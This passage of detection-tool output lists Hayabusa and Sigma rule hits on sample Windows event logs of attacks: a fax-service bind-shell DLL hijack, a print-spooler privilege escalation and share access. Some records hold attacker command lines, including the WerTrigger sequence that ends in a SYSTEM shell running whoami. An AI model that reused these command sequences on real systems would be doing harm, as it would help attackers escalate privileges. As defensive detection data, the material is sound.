747F3D96-E8A7-5F26-0000-0010230D1A00 | Tgt PID: 820 | Tgt PGUID: 747F3D96-E309-5F26-0000-0010137B0000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/faxhell_sysmon_7_1_18_3_bindshell_dllhijack.evtx +2020-08-02 16:24:08.403 +00:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 0:0:0:0:0:0:0:1:49674 (MSEDGEWIN10) | Dst: 0:0:0:0:0:0:0:1:445 (MSEDGEWIN10) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 747F3D96-E303-5F26-0000-0010EB030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/faxhell_sysmon_7_1_18_3_bindshell_dllhijack.evtx +2020-08-02 16:24:08.403 +00:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 0:0:0:0:0:0:0:1:49674 (MSEDGEWIN10) | Dst: 0:0:0:0:0:0:0:1:445 (MSEDGEWIN10) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 
747F3D96-E303-5F26-0000-0010EB030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/faxhell_sysmon_7_1_18_3_bindshell_dllhijack.evtx +2020-08-02 16:24:25.728 +00:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 127.0.0.1:49675 (MSEDGEWIN10) | Dst: 127.0.0.1:9299 (MSEDGEWIN10) | User: MSEDGEWIN10\IEUser | Process: C:\Users\IEUser\Tools\Misc\nc.exe | PID: 7836 | PGUID: 747F3D96-E8B8-5F26-0000-00100AA71A00,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/faxhell_sysmon_7_1_18_3_bindshell_dllhijack.evtx +2020-08-02 16:24:25.728 +00:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 127.0.0.1:49675 (MSEDGEWIN10) | Dst: 127.0.0.1:9299 (MSEDGEWIN10) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\System32\FXSSVC.exe | PID: 5252 | PGUID: 747F3D96-E8A7-5F26-0000-0010230D1A00,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/faxhell_sysmon_7_1_18_3_bindshell_dllhijack.evtx +2020-08-02 16:24:26.809 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""c:\windows\system32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch -p | LID: 0x3e7 | PID: 8104 | PGUID: 747F3D96-E8BA-5F26-0000-001035BE1A00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/faxhell_sysmon_7_1_18_3_bindshell_dllhijack.evtx +2020-08-02 16:24:28.640 +00:00,MSEDGEWIN10,1,low,Disc,Local Accounts Discovery,,rules/sigma/process_creation_sysmon/proc_creation_win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/faxhell_sysmon_7_1_18_3_bindshell_dllhijack.evtx +2020-08-02 16:24:28.640 +00:00,MSEDGEWIN10,1,high,PrivEsc | Disc,Run Whoami as 
SYSTEM,,rules/sigma/process_creation_sysmon/proc_creation_win_whoami_as_system.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/faxhell_sysmon_7_1_18_3_bindshell_dllhijack.evtx +2020-08-02 16:24:28.640 +00:00,MSEDGEWIN10,1,medium,Disc,Whoami Execution,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/faxhell_sysmon_7_1_18_3_bindshell_dllhijack.evtx +2020-08-02 16:24:28.640 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: whoami | Process: C:\Windows\System32\whoami.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: ""c:\windows\system32\cmd.exe"" | LID: 0x3e7 | PID: 588 | PGUID: 747F3D96-E8BC-5F26-0000-0010F7C41A00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/faxhell_sysmon_7_1_18_3_bindshell_dllhijack.evtx +2020-08-12 13:04:27.419 +00:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\Temp\__SKIP_1E14 | Process: C:\Windows\System32\spoolsv.exe | PID: 7700 | PGUID: 747F3D96-E8AB-5F33-0000-001057D13900,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx +2020-08-12 13:04:27.454 +00:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\spool\drivers\x64\{A6F2FD48-5F14-4B5F-ACC3-8DE2ACD8E384} | Process: C:\Windows\System32\spoolsv.exe | PID: 7700 | PGUID: 747F3D96-E8AB-5F33-0000-001057D13900,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx +2020-08-12 13:04:27.551 +00:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\spool\drivers\x64\3\Old | Process: C:\Windows\System32\spoolsv.exe | PID: 7700 | PGUID: 747F3D96-E8AB-5F33-0000-001057D13900,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege 
Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx +2020-08-12 13:04:27.551 +00:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\spool\drivers\x64\3\New | Process: C:\Windows\System32\spoolsv.exe | PID: 7700 | PGUID: 747F3D96-E8AB-5F33-0000-001057D13900,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx +2020-08-12 13:04:27.551 +00:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\spool\drivers\x64\3\New\UNIDRV.DLL | Process: C:\Windows\System32\spoolsv.exe | PID: 7700 | PGUID: 747F3D96-E8AB-5F33-0000-001057D13900,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx +2020-08-12 13:04:27.562 +00:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\spool\drivers\x64\3\New\UNIDRVUI.DLL | Process: C:\Windows\System32\spoolsv.exe | PID: 7700 | PGUID: 747F3D96-E8AB-5F33-0000-001057D13900,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx +2020-08-12 13:04:27.562 +00:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\spool\drivers\x64\3\New\TTY.GPD | Process: C:\Windows\System32\spoolsv.exe | PID: 7700 | PGUID: 747F3D96-E8AB-5F33-0000-001057D13900,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx +2020-08-12 13:04:27.562 +00:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\spool\drivers\x64\3\New\UNIDRV.HLP | Process: C:\Windows\System32\spoolsv.exe | PID: 7700 | PGUID: 747F3D96-E8AB-5F33-0000-001057D13900,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx +2020-08-12 13:04:27.562 
+00:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\spool\drivers\x64\3\New\TTYRES.DLL | Process: C:\Windows\System32\spoolsv.exe | PID: 7700 | PGUID: 747F3D96-E8AB-5F33-0000-001057D13900,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx +2020-08-12 13:04:27.562 +00:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\spool\drivers\x64\3\New\TTY.INI | Process: C:\Windows\System32\spoolsv.exe | PID: 7700 | PGUID: 747F3D96-E8AB-5F33-0000-001057D13900,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx +2020-08-12 13:04:27.563 +00:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\spool\drivers\x64\3\New\TTY.DLL | Process: C:\Windows\System32\spoolsv.exe | PID: 7700 | PGUID: 747F3D96-E8AB-5F33-0000-001057D13900,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx +2020-08-12 13:04:27.563 +00:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\spool\drivers\x64\3\New\TTYUI.DLL | Process: C:\Windows\System32\spoolsv.exe | PID: 7700 | PGUID: 747F3D96-E8AB-5F33-0000-001057D13900,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx +2020-08-12 13:04:27.563 +00:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\spool\drivers\x64\3\New\TTYUI.HLP | Process: C:\Windows\System32\spoolsv.exe | PID: 7700 | PGUID: 747F3D96-E8AB-5F33-0000-001057D13900,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx +2020-08-12 13:04:27.563 +00:00,MSEDGEWIN10,11,info,,File Created,Path: 
C:\Windows\System32\spool\drivers\x64\3\New\UNIRES.DLL | Process: C:\Windows\System32\spoolsv.exe | PID: 7700 | PGUID: 747F3D96-E8AB-5F33-0000-001057D13900,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx +2020-08-12 13:04:27.602 +00:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\spool\drivers\x64\3\New\STDNAMES.GPD | Process: C:\Windows\System32\spoolsv.exe | PID: 7700 | PGUID: 747F3D96-E8AB-5F33-0000-001057D13900,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx +2020-08-12 13:04:27.602 +00:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\spool\drivers\x64\3\New\STDDTYPE.GDL | Process: C:\Windows\System32\spoolsv.exe | PID: 7700 | PGUID: 747F3D96-E8AB-5F33-0000-001057D13900,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx +2020-08-12 13:04:27.603 +00:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\spool\drivers\x64\3\New\STDSCHEM.GDL | Process: C:\Windows\System32\spoolsv.exe | PID: 7700 | PGUID: 747F3D96-E8AB-5F33-0000-001057D13900,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx +2020-08-12 13:04:27.603 +00:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\spool\drivers\x64\3\New\STDSCHMX.GDL | Process: C:\Windows\System32\spoolsv.exe | PID: 7700 | PGUID: 747F3D96-E8AB-5F33-0000-001057D13900,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx +2020-08-12 13:04:27.622 +00:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\spool\drivers\x64\3\Old\1 | Process: 
C:\Windows\System32\spoolsv.exe | PID: 7700 | PGUID: 747F3D96-E8AB-5F33-0000-001057D13900,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx +2020-08-12 13:04:27.949 +00:00,MSEDGEWIN10,11,info,,File Created,Path: C:\blah\blah\phoneinfo.dll | Process: C:\Windows\System32\spoolsv.exe | PID: 7700 | PGUID: 747F3D96-E8AB-5F33-0000-001057D13900,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx +2020-08-12 13:04:27.949 +00:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,Suspicious Print Port | SetValue: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Ports\c:\blah\blah\phoneinfo.dll: (Empty) | Process: C:\Windows\System32\spoolsv.exe | PID: 7700 | PGUID: 747F3D96-E8AB-5F33-0000-001057D13900,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx +2020-08-12 13:04:28.509 +00:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\spool\PRINTERS\00002.SPL | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 2532 | PGUID: 747F3D96-E8D1-5F33-0000-001007B63A00,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx +2020-08-12 13:04:28.509 +00:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\spool\PRINTERS\00002.SHD | Process: C:\Windows\System32\spoolsv.exe | PID: 7700 | PGUID: 747F3D96-E8AB-5F33-0000-001057D13900,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx +2020-08-12 13:04:28.521 +00:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\spool\PRINTERS\00002.SHD | 
Process: C:\Windows\System32\spoolsv.exe | PID: 7700 | PGUID: 747F3D96-E8AB-5F33-0000-001057D13900,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx +2020-08-12 13:05:19.719 +00:00,MSEDGEWIN10,4,info,,Sysmon Service State Changed,State: Started | SchemaVersion: 4.23,rules/hayabusa/sysmon/events/4_SysmonServiceStateChanged.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx +2020-08-12 13:05:20.029 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: C:\Windows\SYSTEM32\cmd.exe /c """"C:\Program Files\Npcap\CheckStatus.bat"""" | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule | LID: 0x3e7 | PID: 1740 | PGUID: 747F3D96-E90A-5F33-0000-0010863C0100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx +2020-08-12 13:05:20.378 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: cmd.exe | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 3320 | PGUID: 747F3D96-E90C-5F33-0000-0010CB420200,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx +2020-08-12 13:05:20.378 +00:00,MSEDGEWIN10,1,high,PrivEsc,Abused Debug Privilege by Arbitrary Parent Processes,,rules/sigma/process_creation_sysmon/proc_creation_win_abusing_debug_privilege.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx +2020-08-12 13:05:36.555 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: 
C:\Windows\Explorer.EXE | LID: 0x41c24 | PID: 5128 | PGUID: 747F3D96-E920-5F33-0000-001043920A00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx +2020-08-12 13:05:38.260 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: C:\Windows\system32\cmd.exe /c reg query ""HKLM\Software\WOW6432Node\Npcap"" /ve 2>nul | find ""REG_SZ"" | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\SYSTEM32\cmd.exe /c """"C:\Program Files\Npcap\CheckStatus.bat"""" | LID: 0x3e7 | PID: 6952 | PGUID: 747F3D96-E922-5F33-0000-00107A2B0B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx +2020-08-12 13:05:38.260 +00:00,MSEDGEWIN10,1,low,Disc,Redirect Output in CommandLine,,rules/sigma/process_creation_sysmon/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx +2020-08-12 13:05:45.570 +00:00,MSEDGEWIN10,10,low,,Process Access,Src Process: C:\Windows\Explorer.EXE | Tgt Process: C:\Program Files (x86)\FileZilla Server\FileZilla Server Interface.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 5144 | Src PGUID: 747F3D96-E914-5F33-0000-001009990500 | Tgt PID: 7480 | Tgt PGUID: 747F3D96-E928-5F33-0000-0010B8330D00,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx +2020-08-12 13:06:00.737 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\cmd.exe /c rmdir /s/q C:\ProgramData\Microsoft\Windows\WER\ReportQueue\a_b_c_d_e > nul 2>&1 | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: WerTrigger.exe | LID: 0x41c24 | PID: 7836 | PGUID: 
747F3D96-E938-5F33-0000-00101CA50E00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx +2020-08-12 13:06:00.737 +00:00,MSEDGEWIN10,1,high,,Parent in Public Folder Suspicious Process,,rules/sigma/process_creation_sysmon/proc_creation_win_public_folder_parent.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx +2020-08-12 13:06:00.737 +00:00,MSEDGEWIN10,1,low,Evas,Windows Cmd Delete File,,rules/sigma/process_creation_sysmon/proc_creation_win_cmd_delete.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx +2020-08-12 13:06:00.737 +00:00,MSEDGEWIN10,1,low,Disc,Redirect Output in CommandLine,,rules/sigma/process_creation_sysmon/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx +2020-08-12 13:06:01.637 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: C:\Windows\system32\cmd.exe /c mkdir,C:\ProgramData\Microsoft\Windows\WER\ReportQueue\a_b_c_d_e | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: WerTrigger.exe | LID: 0x41c24 | PID: 7852 | PGUID: 747F3D96-E939-5F33-0000-0010ACAB0E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx +2020-08-12 13:06:01.637 +00:00,MSEDGEWIN10,1,high,,Parent in Public Folder Suspicious Process,,rules/sigma/process_creation_sysmon/proc_creation_win_public_folder_parent.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx +2020-08-12 13:06:02.552 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\cmd.exe /c copy Report.wer C:\ProgramData\Microsoft\Windows\WER\ReportQueue\a_b_c_d_e > nul 2>&1 | Process: 
C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: WerTrigger.exe | LID: 0x41c24 | PID: 7868 | PGUID: 747F3D96-E93A-5F33-0000-001014B30E00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx +2020-08-12 13:06:02.552 +00:00,MSEDGEWIN10,1,high,,Parent in Public Folder Suspicious Process,,rules/sigma/process_creation_sysmon/proc_creation_win_public_folder_parent.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx +2020-08-12 13:06:02.552 +00:00,MSEDGEWIN10,1,low,Disc,Redirect Output in CommandLine,,rules/sigma/process_creation_sysmon/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx +2020-08-12 13:06:03.487 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: C:\Windows\system32\cmd.exe /c schtasks /run /TN ""Microsoft\Windows\Windows Error Reporting\QueueReporting"" > nul 2>&1 | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: WerTrigger.exe | LID: 0x41c24 | PID: 7888 | PGUID: 747F3D96-E93B-5F33-0000-0010C1B40E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx +2020-08-12 13:06:03.487 +00:00,MSEDGEWIN10,1,high,,Parent in Public Folder Suspicious Process,,rules/sigma/process_creation_sysmon/proc_creation_win_public_folder_parent.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx +2020-08-12 13:06:03.487 +00:00,MSEDGEWIN10,1,low,Disc,Redirect Output in CommandLine,,rules/sigma/process_creation_sysmon/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx +2020-08-12 13:06:04.075 
+00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\wermgr.exe -upload | LID: 0x3e7 | PID: 8032 | PGUID: 747F3D96-E93C-5F33-0000-0010A6F00E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx +2020-08-12 13:06:08.143 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: whoami | Process: C:\Windows\System32\whoami.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x3e7 | PID: 7460 | PGUID: 747F3D96-E940-5F33-0000-001039310F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx +2020-08-12 13:06:08.143 +00:00,MSEDGEWIN10,1,low,Disc,Local Accounts Discovery,,rules/sigma/process_creation_sysmon/proc_creation_win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx +2020-08-12 13:06:08.143 +00:00,MSEDGEWIN10,1,high,PrivEsc | Disc,Run Whoami as SYSTEM,,rules/sigma/process_creation_sysmon/proc_creation_win_whoami_as_system.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx +2020-08-12 13:06:08.143 +00:00,MSEDGEWIN10,1,medium,Disc,Whoami Execution,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx +2020-08-20 15:35:28.503 +00:00,rootdc1.offsec.lan,5140,info,Collect,Network Share Access,User: hack-admu-test1 | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.23.9 | LID: 
0x2275e86d,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-Failed ADMIN$ share access.evtx +2020-08-20 15:36:32.382 +00:00,rootdc1.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: | IP Addr: 10.23.23.9 | LID: 0x2276a30d,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-Failed ADMIN$ share access.evtx +2020-08-20 15:36:32.391 +00:00,rootdc1.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.23.9 | LID: 0x2276a30d,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-Failed ADMIN$ share access.evtx +2020-08-20 15:37:06.186 +00:00,rootdc1.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.23.9 | LID: 0x2276ac17,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-Failed ADMIN$ share access.evtx +2020-08-20 15:37:14.331 +00:00,rootdc1.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: | IP Addr: 10.23.23.9 | LID: 0x2276ac17,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-Failed ADMIN$ share access.evtx +2020-08-20 15:37:17.039 +00:00,rootdc1.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share 
